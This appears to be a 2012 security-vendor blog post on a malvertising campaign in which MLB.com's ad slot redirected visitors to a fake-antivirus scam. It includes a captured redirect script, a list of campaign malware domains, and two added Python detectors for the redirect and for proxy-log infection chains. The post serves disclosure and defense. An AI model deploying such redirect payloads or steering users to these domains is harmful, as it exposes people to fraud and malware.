18 Jun

MLB.com distributing Fake AV Malware via compromised Ad Network

Written by Evan Keiser. Posted in Blog Post

Perimeter’s Security Operations Center has discovered that Major League Baseball’s website, MLB.com, is distributing malware via a compromised ad network.

Sadly, this has become an extremely common issue: well-known and respected websites inadvertently distribute malware because one of the syndicated ads they host has been compromised. But first, a little background on how web advertising works. Most popular destination websites host ads. The website operator provides a slot (an IFRAME or DIV) into which an ad network loads its ads. Many of these ad networks, in turn, load content from syndication partners and from other ad networks. At some point down the chain, one of these partners sources the actual creative from the advertiser’s web server. Because of the multiple layers of syndication between the website and the originating ad server, it can often be very hard to tell where an ad actually came from, and the publisher rarely sees the content before it is served to its visitors. It’s only a slight exaggeration to say that the lack of transparency and the web of indirect relationships make the average ad network look like the Fulton Fish Market next to the New York Stock Exchange. The bad guys know this, of course, which is why sites like the New York Times have accidentally served up malware in the past.

Over the past week, we noticed that several customers who attempted to download various “fake antivirus” malware had accessed MLB.com immediately before the installation attempt. We suspected a polluted ad network, but needed proof. Because the ad slot rotates through many creatives, the malicious one is only served occasionally; after refreshing MLB.com 20–30 times we finally received the redirect shown and detailed below.

Despite the “drive-by” label, this specific download attempt actually requires quite a bit of user interaction: nothing is exploited automatically. After clicking “Clean Computer” the user is prompted to download the file setup.exe, which contains the actual fake-AV program. Like most fake-AV programs, it pretends to scan the victim’s computer, finds files it claims are infected, and then tries to get the victim to purchase the “Full Version” to remove the nonexistent threats for the low, low price of $99.99. This specific variant presents itself as “Windows Secure Web Patch”. Needless to say, this program is fraudulent, so do not purchase it.

MLB.com infection redirect

Technical Details

After analyzing the packet capture taken during the infection process, we verified that the redirect comes from an ad server referenced by MLB.com, specifically adginserver.com. The key fields from the capture:

time = 2012-Jun-15 19:52:16
ip.dst = 78.159.121.107
query = q=zvCEjFbnwtAoOjktBLpz9Cs35+x5OSaQwpZhV0PW
referer = hxxp://mlb.mlb.com/news/?tcid=nav_mlb_news
client = Mozilla/4.0
alias.ip = 78.159.121.107
alias.host = adginserver.com <— Ad server pushing the fake-AV malware
country.dst = Germany
org.dst = Leaseweb Germany GmbH (previously netdirekt e. K.)

GET Request

GET /in?q=zvCEjFbnwtAoOjktBLpz9Cs35+x5OSaQwpZhV0PW HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hxxp://mlb.mlb.com/news/?tcid=nav_mlb_news
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Accept-Encoding: gzip, deflate
Host: adginserver.com
Connection: Keep-Alive


HTTP Response

HTTP/1.1 200 OK
Date: Fri, 15 Jun 2012 20:55:32 GMT
Server: Apache/2.2.21 (CentOS)
Content-Location: in.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/5.2.17
Content-Length: 160
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<body>
<script>
window.top.location.href="hxxp://inspectionguarantorcustodian.in/78dee9e271084cb2/40/";
</script>
</body>
</html>

Note that the “ad” contains no image or markup at all: its entire body is a script that assigns window.top.location.href, which moves the whole browser window, not just the ad’s IFRAME, to the fake-AV landing page.

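The response above is the whole malicious creative: no image, no visible markup, just a script that sends the top-level window to a .in domain. The following Python is an added example written for this post, not code from Perimeter or from the original article. It parses a constructed copy of that response (the landing URL is kept defanged as hxxp) and flags an HTML ad response whose only content is an off-site top-frame redirect; the benign comparison response and the hostname ads.example.test are constructed for illustration.

```python
"""Added example: detect an ad response whose only content is a script that
sends the top-level window off-site (the pattern captured in the post)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed copy of the captured response; the landing URL is kept defanged (hxxp).
MALICIOUS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.21 (CentOS)\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<html>\n<body>\n<script>\n"
    'window.top.location.href="hxxp://inspectionguarantorcustodian.in/78dee9e271084cb2/40/";\n'
    "</script>\n</body>\n</html>"
)

# Constructed benign creative for comparison (ads.example.test is made up).
BENIGN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    '<html><body><a href="http://ads.example.test/click?id=1">'
    '<img src="http://ads.example.test/creative.gif" alt="ad"></a></body></html>'
)

# Assignment to top.location / window.top.location(.href) from inside an ad frame.
TOP_REDIRECT_RE = re.compile(
    r"""(?:window\.)?top\.location(?:\.href)?\s*=\s*["']([^"']+)["']"""
)


def split_response(raw):
    """Return (status line, lowercase header dict, body) of a raw HTTP response."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


class _BodyParser(HTMLParser):
    """Separate visible text from <script> bodies."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.text = []
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        (self.scripts if self.in_script else self.text).append(data)


def refang(url):
    """Turn a defanged hxxp:// URL back into http:// so urlsplit sees a scheme."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def analyse(raw_response, ad_server_host):
    """Return None when the response has no top-frame redirect, else a verdict dict."""
    _, headers, body = split_response(raw_response)
    if not headers.get("content-type", "").startswith("text/html"):
        return None
    parser = _BodyParser()
    parser.feed(body)
    match = TOP_REDIRECT_RE.search("\n".join(parser.scripts))
    if not match:
        return None
    target_host = urlsplit(refang(match.group(1))).hostname or ""
    offsite = target_host != ad_server_host and not target_host.endswith("." + ad_server_host)
    no_visible_content = "".join(parser.text).strip() == ""
    return {
        "target_host": target_host,
        "offsite": offsite,
        "no_visible_content": no_visible_content,
        # An ad that draws nothing and only moves the top window elsewhere is the
        # malvertising redirect shape seen in the capture above.
        "suspicious": offsite and no_visible_content,
    }


if __name__ == "__main__":
    print(analyse(MALICIOUS_RESPONSE, "adginserver.com"))
    print(analyse(BENIGN_RESPONSE, "adginserver.com"))
```

A legitimate creative that merely links out on click is not flagged, because nothing in it assigns top.location; the check is deliberately narrow so it can run inline on an ad-server response in a proxy without many false positives.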

Sites Involved in this Malware Campaign.

We have posted these for informational purposes only and STRONGLY RECOMMEND that you do not visit any of these pages unless you would like to infect yourself.

  • brittlenessverifydanger.in
  • cleanmonitordetector.in
  • controltesterutility.in
  • defenderstabilitycrashes.in
  • guarantorefficiencysolver.in
  • hightasksdanger.in
  • informationbrittlenessmicrosoft.in
  • netonlinestability.in
  • perilsworryvulnerability.in
  • protectremedyqueerprocess.in
  • risksanalysis.in
  • riskscenterantivirus.in
  • risksthreatclean.in
  • saverbrittlenessclean.in
  • scandebuggerstability.in
  • solutiondeliverertrojans.in
  • systemtestrisks.in
  • threatworryguarantor.in
  • trojanscontrolsolver.in
  • vulnerabilityqueerprocessbrittleness.in
  • vulnerabilitysupervisionsaver.in
  • worrycontrol.in
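To find affected machines the way the SOC did (a client visits MLB.com, fetches the ad from adginserver.com, lands on one of the .in domains, then pulls setup.exe), the chain can be reconstructed from proxy logs. The following Python is an added example, not from the original post. The log format (time, client, method, URL, status, referer) and the log lines themselves are constructed for illustration, and only a few of the campaign domains listed above are included in the indicator set.

```python
"""Added example: reconstruct publisher -> ad server -> fake-AV landing page ->
setup.exe chains per client from a proxy log."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

AD_SERVER = "adginserver.com"
# Subset of the campaign domains listed in the post.
CAMPAIGN_DOMAINS = {
    "inspectionguarantorcustodian.in",
    "brittlenessverifydanger.in",
    "cleanmonitordetector.in",
    "risksanalysis.in",
}

# Constructed sample log (not real customer data):
# time client method url status referer   ("-" = no referer)
SAMPLE_LOG = """\
2012-06-15T19:52:10 10.1.1.25 GET http://mlb.mlb.com/news/?tcid=nav_mlb_news 200 -
2012-06-15T19:52:16 10.1.1.25 GET http://adginserver.com/in?q=zvCEjFbnwtAoOjktBLpz9Cs35+x5OSaQwpZhV0PW 200 http://mlb.mlb.com/news/?tcid=nav_mlb_news
2012-06-15T19:52:17 10.1.1.25 GET http://inspectionguarantorcustodian.in/78dee9e271084cb2/40/ 200 http://adginserver.com/in
2012-06-15T19:52:41 10.1.1.25 GET http://inspectionguarantorcustodian.in/setup.exe 200 http://inspectionguarantorcustodian.in/78dee9e271084cb2/40/
2012-06-15T19:53:02 10.1.1.77 GET http://mlb.mlb.com/scores/ 200 -
2012-06-15T19:53:05 10.1.1.77 GET http://adginserver.com/in?q=abc 200 http://mlb.mlb.com/scores/
2012-06-15T19:53:06 10.1.1.77 GET http://cdn.example-advertiser.test/creative.gif 200 http://mlb.mlb.com/scores/
"""


def parse_line(line):
    """Parse one constructed log line into a dict with a datetime and host."""
    ts, client, method, url, status, referer = line.split(maxsplit=5)
    return {
        "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"),
        "client": client,
        "method": method,
        "url": url,
        "status": status,
        "referer": None if referer == "-" else referer,
        "host": urlsplit(url).hostname or "",
    }


def find_chains(log_text, window=timedelta(seconds=60)):
    """Return one dict per client whose ad-server hit was followed, within
    `window`, by a request to a campaign domain; mark whether an .exe was
    then fetched from that domain."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            event = parse_line(line)
            by_client[event["client"]].append(event)

    chains = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e["time"])
        last_ad = None  # most recent request to the ad server
        chain = None    # chain currently being assembled for this client
        for event in events:
            if event["host"] == AD_SERVER:
                last_ad = event
            elif event["host"] in CAMPAIGN_DOMAINS:
                path = urlsplit(event["url"]).path.lower()
                if chain and path.endswith(".exe") and \
                        event["time"] - chain["landing_time"] <= window:
                    chain["downloaded_exe"] = True
                elif last_ad and event["time"] - last_ad["time"] <= window:
                    # The ad server's referer tells us which publisher page
                    # carried the poisoned slot.
                    publisher = urlsplit(last_ad["referer"] or "").hostname
                    chain = {
                        "client": client,
                        "publisher": publisher,
                        "ad_server": AD_SERVER,
                        "landing_host": event["host"],
                        "landing_time": event["time"],
                        "downloaded_exe": False,
                    }
                    chains.append(chain)
    return chains


if __name__ == "__main__":
    for c in find_chains(SAMPLE_LOG):
        print(c)
```

The second client in the sample hit the same ad slot but was served a normal creative, so it produces no chain; the first client is flagged with downloaded_exe set, which is the case that needs a host-level follow-up rather than just a block.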

When we began investigating this particular malware campaign, the detection ratio by AV vendors was quite low. After running the malicious file through VirusTotal.com again today, it seems quite a few other AV providers now have detections for this fake-AV variant as seen here:

https://www.virustotal.com/file/042597537bd85333bd92d6e19dcc4e1cdd4663f1cda978098a60d9c56c426789/analysis/1340037948/

How Perimeter is protecting our customers

For Perimeter in-the-cloud (ITC) customers, we have added a null-route for the IP address to which all of the malicious domains resolve; this is the address actually serving the malware. We have also submitted the advertising domain and the .in domains to Fortinet to be recategorized as Malware until the issue is resolved by MLB.com, which is still using this advertising server. The null-route only helps while the campaign domains stay on that address, so the domain-level categorization matters as well.

For MSSP customers using FortiGate, you should take these additional steps to reduce the risk of infection:

  • subscribe to Web Content Filtering and block the Advertising and Unrated categories
  • subscribe to network anti-virus and block downloads of executables

In the meantime, we suggest that you avoid the MLB website. If you need to catch up on your baseball scores, consider espn.com.

Andrew Jaquith contributed to this post.


Comments (2)

  • Ryan
    June 18, 2012 at 7:58 pm |

    I have the privilege of going through proxy logs at work… If I want to find malware I know I can just go to the section with the .in domains and find some…

  • [...] to a blog post by Evan Keiser, researcher at Perimeter E-Security, the “multiple layers of syndication” [...]
